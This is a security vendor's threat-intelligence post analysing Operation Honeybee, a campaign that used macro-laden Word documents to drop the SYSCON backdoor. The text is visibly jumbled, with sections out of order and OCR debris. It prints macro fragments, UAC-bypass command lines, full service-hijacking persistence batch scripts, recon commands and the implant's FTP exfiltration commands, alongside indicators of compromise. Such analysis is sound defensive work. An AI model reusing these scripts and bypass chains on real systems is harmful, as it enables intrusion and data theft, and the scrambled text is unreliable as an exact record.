This post was written with contributions from Jessica Saavedra-Morales, Thomas Roccia, and Asheer Malhotra.

**⋈** McAfee

McAfee Advanced Threat Research analysts have discovered a new operation targeting humanitarian aid organizations and using North Korean political topics as bait to lure victims into opening malicious Microsoft Word documents. Our analysts have named this Operation Honeybee, based on the names of the malicious documents used in the attacks. Advanced Threat Research analysts have also discovered malicious documents authored by the same actor that indicate a tactical shift.

These documents do not contain the typical lures by this actor, instead using Word compatibility messages to entice victims into The Advanced Threat Research team also observed a heavy concentration of the implant in Vietnam from January 15–17.

Honeybee Campaign Timeline

On January 15, Advanced Threat Research discovered an operation using a new variant of the SYSCON backdoor. The Korean-language Word document manual.doc appeared in Vietnam on January 17, with the original author name of Honeybee

SYSCON. This key was also used in the Honeybee campaign and appears to have been used since August 2017.

This document is only authorized by Chick Enable editing button lightly button from the yellow bar above content button from the yellow bar above. Examples of decoy documents. Several additional documents surfaced between January 17 and February 3. All contain the same Visual Basic macro code and author name as Honeybee. Some of the malicious documents were test files without the implant. From our analysis, most these documents were submitted from South Korea, indicating that some of the targeting was in South Korea. These Honeybee documents did not contain any specific lures, rather variations of a "not compatible" message attempting to convince the user to enable content We also observed a related malicious document created January 12 by the author Windows User that contained a different encoding key, but essentially used the same macro and same type of implant as we saw with the recent Honeybee documents. This document, "International Federation of Red Cross and Red Crescent Societies - DPRK Country Office," drops an implant with the control server Index of /

The directory contents of control server 1113427185.ifastnet.org.  $\leftarrow$   $\rightarrow$   ${\tt C}$   ${\tt O}$  Not secure | ftp://ftp.byethost11.com Index of /

0 B htdocs/ 2/13/18, 5:19:00 PM 2/14/18, 8:45:00 AM The directory contents of ftp.byethost11.com, from Honeybee samples

**MaoCheng Dropper** Aside from finding the malicious documents, the Advanced Threat Research team discovered a Win32-based executable dropper. This dropper uses a stolen digital signature from Adobe Systems. This certificate is also used by another Korean-language malware compiled January 16 (hash: 35904f482d37f5ce6034d6042bae207418e450f4) with an interesting program database (PDB) path. D:\Task\DDE Attack\MaoCheng\Release\Dropper.pdb The malware is a Win32 executable that pretends to be a Word document based on its icon. This is a dropper for the same type of malware as observed with the other Word documents. This sample also dropped a decoy document with the author name Honeybee. This sample, however, contained a bug that interfered with the execution flow of the dropper, suggesting that the authors did not test the malware after code signing it. <a:clrMap xmlns:a="http://schemas.openxmlform HoneyBee Normal.dotm HoneyBee Microsoft Office Word PID\_HLINKS Microsoft Word 97-2003 Document The decoy document uses the cloud-based accounting software company Xero as a lure Contents of this document are protected and secured. If you have problems viewing/loading secure content please select "Enable

00000 0000 00000 0000

00 0000 00 00 0000

00000 0000 A decoy document from MaoCheng dropper **Possible Operator** The Advanced Threat Research team has identified the following persona (snoopykiller@mail.ru) tied to this recent operation. Based on our analysis, the actor registered two free hosting accounts: navermail.byethost3.com, which refers to the popular South Korean search engine, and nihon.byethost11.com. The email address was used to register a free account for a control server in all the implants **Technical Analysis** Let's start with an overview of the attack: Dropper Malicious Word document, with VBA embedded, downloads the implant. Sometimes the dropper is an executable with similar functionalities drops a decoy document W Bypasses user account controlElevates privileges setup.cab extracted

Installs ipnet.dll as a service for Install2.bat 64-bit systems We continue with the components involved in this operation

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BAT nstall1.b

SHA-1

9b7c3c48bcef6330e3086de592b3223eb198744a

9e2c0bd19a77d712055ccc0276fdc062e9351436

85e2453b37602429596c9681a8c58a5c6faf8d0c

f3b62fea38cb44e15984d941445d24e6b309bc7b

1 d280 a77595 a2 d2 bb d36 b9 b5 d958 f99 be 20 f8 e06

NTWDBLIB.dll

Runs batch files

nResult = InStr(Application.Path, "x86") If System.Version >= "6.0" Then
nResult = Shell("cmd /c wuss %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0) The Document\_Open() subroutine implementing the malicious functionality. The Visual Basic macro performs the following tasks: • Opens a handle to the malicious document to read the encoded CAB file

 $D: \label{linear_linear_linear_linear} D: \label{linear_$ • bat: A batch file to set up the service COMSysApp, for an x64 system • bat: A batch file to set up the service COMSysApp, for an x86 system  $\label{thm:com_vs10} D: \label{thm:com_vs10} D: \label{thm:com_vs10} I = \label{thm:com_vs10}.$ again bypass UAC prompts Once the files have been extracted, the Visual Basic macro deletes the CAB file and runs the malicious NTWDBLIB.dll via cliconfg.exe (to gain privileges and bypass UAC protections) · Command lines used by the Visual Basic macro: cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe cmd /c expand %TEMP%\setup.cab -F:\* %SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe A combination of NTWDBLIB.dll and cliconfg.exe are used to bypass UAC protections; this is a familiar attack on Windows. UAC bypass via DLL hijacking requires: A Windows executable with the auto-elevate property in its manifest • A Windows executable in a secure directory (%systemroot%\system32) The malicious NTWDBLIB DLL performs the simple task of setting up the malicious ipnet.dll as a service by running one of the two batch files contained in the CAB file (which is also dropped to %systemroot%\system32): push offset aCmdCInstall1\_b ; "cmd /c install1.bat"
jmp short loc 100010FB loc\_100010F6: ; CODE XREF: DllMain(x,x,x)+ED<sup>†</sup>j
push offset aCmdCInstall2\_b ; "cmd /c install2.bat" ; CODE XREF: DllMain(x,x,x)+F4†j loc\_100010FB: NTWDBLIB executing the installer batch files under the context of cliconfg.exe. The batch files involved in the attack modify the system service COMSysApp to load the malicious ipnet.dll. The contents of the batch

The Cooperation Agreement Strategy (CAS) is an important Strategy put up by the Democratic People's Republic of Korea Red Cross Society (DPRK RCS), its Partners and International Federation of Red Cross and Red Crescent Societies (IPRC) to coordinate efforts and mobilise resources to support the DPRK RCS and IPRC to effectively and efficiently deliver its humanitarian Programme, as well as providing a mechanism for sister National Societies to support the development of the DPRK RCS's capacity. An annual meeting has been built into the Strategy as it provides a forumplatform to share information, evaluates each year's performance and bringing new players on board. Thus since 1995, the DPRK RCS has been supported by the Federation's narticinating national

1. The history and introduction of DPRK CAS program.

 There is one CAB file for an x86 system and another for an x64 system • This malware sample uses uacme.exe with dummy.dll to implement the UAC bypass

• exe is the program vulnerable to the UAC bypass attack • dll runs install.bat to set up the service (same as NTWDBLIB.dll)

. The Visual Basic macro uses the following command line:

**Data Reconnaissance** 

02).txt

files vary depending on the OS (x64 vs x86):

IPNet.dll runs as a service under svchost.exe.

Variant using North Korean Red Cross

install1.bat (x64)

The following information is gathered from the endpoint and sent to the control server • System info using: cmd /c systeminfo >%temp%\temp.ini  $\bullet~$  List of currently running process using: cmd /c tasklist >%temp%\temp.ini **Exfiltration** 

• All the text files are now packed into the archive temp.zip (%temp%\temp.zip)

TO <COMPUTERNAME>: Commands issued to endpoints matching the ComputerName

• cmd /c pull <filename>: Adds filename to temp.zip, Base64 encodes, and uploads to control server

• cmd /c put <new\_file\_name> <existing\_file\_name>: Copies existing file to new file name. Deletes existing file. • /user <parameters>: Executes downloaded file with parameters specified using CreateProcessAsUser

**Additional Commands and Capabilities** 

TO EVERYONE: Commands issued to all infected endpoints

The following commands are supported by the malware implant:

• cmd /c <command>: Executes command on infected endpoint

MITRE ATT&CK techniques Modify existing service • Code signing

• Deobfuscate/decode files or information System information discovery · Process discovery Service execution • RunDLL32 Scripting Command-line Interface Data from local system Data encrypted • Commonly used port Bypass user account control

• fe32d29fa16b1b71cd27b23a78ee9f6b7791bff3 • f684e15dd2e84bac49ea9b89f9b2646dc32a2477 • 1d280a77595a2d2bbd36b9b5d958f99be20f8e06 • 19d9573f0b2c2100accd562cc82d57adb12a57ec • f90a2155ac492c3c2d5e1d83e384e1a734e59cc0 • 9b832dda912cce6b23da8abf3881fcf4d2b7ce09 • f3b62fea38cb44e15984d941445d24e6b309bc7b

• The DLL and ini files contain the same functions as described elsewhere in this post

Conclusion

 66d2cea01b46c3353f4339a986a97b24ed89ee18 7113aaab61cacb6086c5531a453adf82ca7e7d03 • d41daba0ebfa55d0c769ccfc03dbf6a5221e006a • 25f4819e7948086d46df8de2eeeaa2b9ec6eca8c • 35ab747c15c20da29a14e8b46c07c0448cef4999 • 0e4a7c0242b98723dc2b8cce1fbf1a43dd025cf0 • bca861a46d60831a3101c50f80a6d626fa99bf16

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**Background** 

This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON, which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea-related topics. The malicious Visual Basic script uses a unique key (custom alphabet) to encode data. We have seen this in previous operations using

Office This doct

Open the document in Moravali Office.

1 Provision gradies in Classification of Trailer (String From the property of Trail

address 1113427185.ifastnet.org, which resolves to the same server used by the implants dropped in the Honeybee case. ← → C ① Not secure | ftp://1113427185.ifastnet.org Date Modified override 0 B
DO NOT UPLOAD FILES HERE 0 B 1/14/18, 2:10:00 PM 1/14/18, 2:10:00 PM htdocs/ 2/13/18, 5:19:00 PM logs/ 2/14/18, 8:45:00 AM

Name Size Date Modified override
DO NOT UPLOAD FILES HERE 1/14/18, 2:10:00 PM 1/14/18, 2:10:00 PM **Directory Listing** 

2018-02-12 08:13 32 Plain text file 2018-02-12 08:13 32 Plain text file 2018-02-12 08:09 32 Plain text file From SVR01 (02-12 22-00-25).txt 2018-02-12 09:08 32 Plain text file 2018-02-12 07:43 32 Plain text file 2018-02-12 07:43 32 Plain text file 2018-02-12 07:38 32 Plain text file 2018-02-12 07:38 32 Plain text file From SVR01 (02-12 22-00-19).txt From SVR01 (02-12 21-34-29).txt From SVR01 (02-12 21-34-25).txt From SVR01 (02-12 21-30-04).txt From SVR01 (02-12 21-30-00).txt 2018-02-12 07:12 32 Plain text file 2018-02-12 07:12 32 Plain text file 2018-02-12 07:08 32 Plain text file 2018-02-12 07:08 32 Plain text file 2018-02-12 06:42 32 Plain text file From SVR01 (02-12 21-04-10).txt From SVR01 (02-12 21-04-06).txt From SVR01 (02-12 20-59-44).txt From SVR01 (02-12 20-59-36).txt From SVR01 (02-12 20-33-51).txt From SVR01 (02-12 20-33-47).txt 2018-02-12 06:42 32 Plain text file Log files of compromised machines from February 2018 Honeybee samples.

From WIN-9328VD0F0QG (02-15 22-06-40).txt 2018-02-15 09:07 1.5K Plain text file From WIN-9328VDDFOQG (02-15 22-06-35).txt 2018-02-15 09:07 2.6K Plain text file From TEST-C327745F05 (02-17 21-35-00).txt 2018-02-17 06:14 1.0K Plain text file From TEST-C327745F05 (02-17 21-34-55).txt 2018-02-17 06:14 1.3K Plain text file

From SVR01 (02-12 22-04-52).txt

From SVR01 (02-12 22-04-46).txt

000 000 000 000 000000 000000

00000

nnnn

nnn n

ipnet.in INI

SYSCON backdoor

Author

Honeybee

Windows

User

Honeybee

Honeybee

Honeybee

Creation Date

1/17/2018

1/10/2018

2/2/2018

2/2/2018

2/2/2018

1/30/2018

2/1/2018

2/3/2018

1/15/2018

11/21/2017

Type

Microsoft Word

File (OLE DOC)

Microsoft Word

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BAT

Installs ipnet.dll as a service for 32-bit systems

File (OLE DOC) a99be81d1955f315abdee4eb774e3da60816f3d2 Microsoft Word Honeybee File (OLE DOC) 66d2cea01b46c3353f4339a986a97b24ed89ee18 Microsoft Word Honeybee File (OLE DOC) 6d74fb57a2b1c347f61ab84ba668442d32a0c54c Microsoft Word Honeybee File (OLE DOC) d41daba0ebfa55d0c769ccfc03dbf6a5221e006a Malicious Service DLL Implant fe32d29fa16b1b71cd27b23a78ee9f6b7791bff3 UAC Bypass DLL The malicious Word file is the beginning of the infection chain and acts as a dropper for two DLL files. The Word file contains malicious Visual Basic macro code that runs when the document is opened in Word using the Document\_Open() autoload function. The word file also contains a Base64-encoded file (encoded with a custom key) in it that is read, decoded, and dropped to the disk by the macro. sFileName = ActiveDocument.FullName cbFileBuffer = FileLen(sFileName)

Set oWscriptShell = CreateObject("WScript.Shell")
sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%") sFileName = ActiveDocument.FullName cbFileBuffer = FileLen(sFileName) nResult = InStr(Application.Path, "x86")

• dll: A malicious DLL used to launch batch files (used with cliconfg.exe for UAC bypass). The DLL contains the following PDB path: • ini: A data file with Base64-encoded data for connecting to an FTP server. Credentials are encoded in the .ini file • dll: The malicious DLL file run as a service (using svchost.exe). The DLL contains the following PDB path:

@echo off
sc stop COMSysApp
sc config COMSysApp type= own start= auto error= normal binpath= "%windir%\SysWOW64\svchost.exe -k COMSysApp"
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v COMSysApp /t REG\_MULTI\_SZ /d "COMSysApp" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\COMSysApp\Parameters" /v ServiceDll /t REG\_EXPAND\_SZ /d "%windir%\SysWOW64\ipnet.dll" /f
sc start COMSysApp
del /f /g %windir%\SysWOW64\install2.bat
del /f /q %windir%\SysWOW64\install1.bat install2.bat (x86) @echo off
sc stop COMSysApp
sc config COMSysApp type= own start= auto error= normal binpath= "%windir%\System32\svchost.exe -k COMSysApp"
reg add "HKLM\SOTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v COMSysApp /t REG\_MULTI SZ /d "COMSysApp" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\COMSysApp\Parameters" /v ServiceDl1 /t REG\_EXPAND\_SZ /d "%windir%\system32\ipnet.dl1" /f sc start COMSysApp del /f /q %windir%\System32\install1.bat del /f /q %windir%\System32\install2.bat The batch files perform these tasks: • Stop the service COMSysApp Configure the service to autostart (to set up persistence on the system) Modify registry keys to launch the DLL unser svchost.exe Specify the malicious DLL path to be loaded into the svchost process. • Immediately restart the service Remove the batch files to reduce the fingerprint on the system

The malicious DLL is also responsible for terminating the cliconfg.exe process and deleting the malicious NTWDBLIB.dll using

Another variant (hash: 9e2c0bd19a77d712055ccc0276fdc062e9351436) of the malicious Word dropper uses the same Base64-decoding

cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL

1 International Federation of Red Cross and Red Crescent Societies-DPRK Country Office

scheme with a different custom key. This document was created January 10.

 $All the following capabilities described are implemented by the malicious service \ DLL \ implant \ unless \ specified.$ 

This variant also consists of two CAB files that are dropped to %temp%, depending on the OS (x86 or x64).

• Two CAB files are encoded into the Word document in text boxes instead of being appended in the DOC file

• exe and dummy.dll may be either 64-bit or 32-bit binaries based on the OS. Ipnet.dll may also be either 64-bit or 32-bit.

cmd /c expand %TEMP%\setup.cab -F:\* %TEMP% && cd /d %TEMP% && del /f /q setup.cab && uacme.exe

 The control server credential information contained in the CAB files is different: Similarities between this variant and the original malware sample:

From <COMPUTER-NAME> (<Month>-<Day> <Hour>-<Minute>-<Second>).txt. For example, From <COMPUTER-NAME> (01-04 11-40-

• zip is Base64 encoded (with a custom key, same as that used in the malicious document) and then copied to post.txt

The service-based DLL implant traverses to the /htdocs/ directory on the FTP server and looks for any files with the keywords:

• cmd /c chip <string>: Deletes current ipnet.ini config file. Writes new config info (control server connection info) to new ipnet.ini.

The actor behind Honeybee has been operating with new implants since at least November 2017 with the first known version of NTWDBLIB installer. Furthermore, based on the various metadata in both documents and executables, the actor is likely a Korean The techniques used in the malicious documents such as the lure messages closely resemble what we have observed before in South Korea. The attacker appears to target those involved in humanitarian aid and inter-Korean affairs. We have seen this operation expand beyond the borders of South Korea to target Vietnam, Singapore, Argentina, Japan, Indonesia, and Canada.  $Based \ on \ the \ McAfee \ Advanced \ Threat \ Research \ team's \ analysis, \ we \ find \ multiple \ components \ from \ this \ operation \ are \ unique \ from \ analysis, \ we \ find \ multiple \ components \ from \ this \ operation \ are \ unique \ from \ analysis, \ we \ find \ multiple \ components \ from \ this \ operation \ are \ unique \ from \ analysis, \ we \ find \ multiple \ components \ from \ this \ operation \ are \ unique \ from \ analysis, \ we \ find \ multiple \ components \ from \ this \ operation \ are \ unique \ from \ analysis, \ we \ find \ multiple \ components \ from \ this \ operation \ are \ unique \ from \ analysis, \ we \ find \ multiple \ components \ from \ this \ operation \ are \ unique \ from \ analysis, \ we \ find \ multiple \ from \ analysis \ from \ from$  $code\ perspective,\ even\ though\ the\ code\ is\ loosely\ based\ on\ previous\ versions\ of\ the\ SYSCON\ backdoor.\ Some\ new\ droppers\ have\ not$ been observed before in the wild. The MaoCheng dropper was apparently created specifically for this operation and appeared only twice in the wild. Indicators of compromise

• 01530adb3f947fabebae5d9c04fb69f9000c3cef 4229896d61a5ad57ed5c247228606ce62c7032d0 4c7e975f95ebc47423923b855a7530af52977f57 • 5a6ad7a1c566204a92dd269312d1156d51e61dc4 • 1dc50bfcab2bc80587ac900c03e23afcbe243f64 • 003e21b02be3248ff72cc2bfcd05bb161b6a2356 • 9b7c3c48bcef6330e3086de592b3223eb198744a • 85e2453b37602429596c9681a8c58a5c6faf8d0c

specializes in threat intelligence in the Asia Pacific Region where he conducts cutting edge research into new adversarial techniques and adapts those to better monitor the threat landscape. He formerly was the Chief Corporate Evangelist at Panda Security, where ... Read more posts from Ryan Sherstobitoff > Next Article > < Previous Article Categories: McAfee Labs Tags: malware, advanced persistent threats, Phishing, cybersecurity, Advanced Threat Research

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